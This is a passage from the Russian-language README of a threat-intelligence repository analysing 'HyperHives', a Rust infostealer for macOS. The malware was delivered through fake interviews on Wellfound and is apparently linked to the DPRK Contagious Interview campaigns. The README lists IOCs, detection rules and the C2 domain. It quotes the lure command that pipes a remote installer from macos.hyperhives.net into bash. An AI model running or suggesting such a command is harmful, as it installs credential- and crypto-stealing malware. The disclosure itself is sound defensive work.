
Полный статический анализ HyperHives macOS Rust infostealer — 571 расшифрованных значений конфигурации, инфраструктура C2, атрибуция DPRK/Contagious Interview, правила YARA/Sigma, пакет STIX 2.1, слой ATT&CK Navigator
Разведка угроз: Rust-based универсальный бинарник macOS, доставляемый через поддельную цепочку собеседований на Wellfound (ранее AngelList). Оператор под псевдонимом «Felix» из «HyperHive» заманивал жертв запустить вредоносный установщик с
macos.hyperhives.net. Этот репозиторий документирует полный статический анализ: восстановлено 571 зашифрованных значений конфигурации, включая C2-URL, Sentry DSN и 276 целевых ID расширений Chrome.
| Образец SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2-домен | cloudproxy.link |
| Домен доставки | macos.hyperhives.net |
| Платформа-приманка | Wellfound (ранее AngelList) |
| Псевдоним оператора | «Felix» в «HyperHive» |
| VirusTotal | 9 / 63 детекций |
| Классификация | Публичное раскрытие / набор IOCs |
| Последнее обновление | Апрель 2026 |
| Файл | Формат | Назначение |
|---|---|---|
iocs.txt | Обычный текст | Хеши, домены, URL, IP, email, Sentry ID — вставьте в блок-листы, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Поиск по хешу известного образца + эвристические строковые детекции для Mach-O |
sigma_rules.yml | Sigma | Правила прокси, DNS и создания процессов — настройте logsource под вашу SIEM |
stix/bundle.json | STIX 2.1 | Машиночитаемый CTI-пакет с индикаторами, SDO вредоносного ПО, инфраструктурой, паттернами ATT&CK и связями |
attack-navigator-layer.json | ATT&CK Navigator | Импортируйте в ATT&CK Navigator для визуального покрытия техник |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## Быстрый старт
Поместите образец как `sample/installer_binary` (см. [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) для проверки хэша), затем:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
Файл compose налагает network_mode: none, read_only: true и отключает все возможности Linux. Полные правила обращения см. в SECURITY.md.
Объявление о вакансии на Wellfound (ранее AngelList) привело к цепочке социальной инженерии из нескольких писем от оператора под именем «Felix» из компании «HyperHive». После лестных отзывов о техническом опыте цели и назначения фиктивного собеседования, злоумышленник направил жертву «просмотреть продукт» на сайте hyperhives.net и специально изучить Settings → Diagnostics → Log — предлог для запуска следующего:```
curl -s https://macos.hyperhives.net/install | nohup bash &
Вредоносная нагрузка представляет собой **универсальный бинарник Mach-O размером 8,5 МБ** (x86_64 + arm64), скомпилированный на Rust. Статический анализ в изолированной Docker-лаборатории с эмуляцией процессора **570 уникальных вспомогательных процедур x86_64** позволил восстановить **все 571 зашифрованных значения конфигурации**, раскрыв:
- **C2:** `cloudproxy.link` — четыре HTTPS-эндпоинта
- **Sentry (атрибуция):** полный DSN с ID организации/проекта на `ingest.de.sentry.io`
- **Идентификатор сборки:** пользователь Cargo `rootr`, кодовое имя `force`, версия `9.12.1`
- **Цели:** 276 идентификаторов расширений Chrome (криптокошельки, менеджеры паролей, корпоративные учётные данные)
Тактика совпадает с **кампаниями Contagious Interview, связанными с КНДР** — фиктивные собеседования на легитимных платформах, многоэтапное построение доверия, доставка через `curl | bash`, Rust-стилер для macOS и кража криптовалютных данных.
---
## 1 — Как это началось
### Приманка: фиктивное собеседование на Wellfound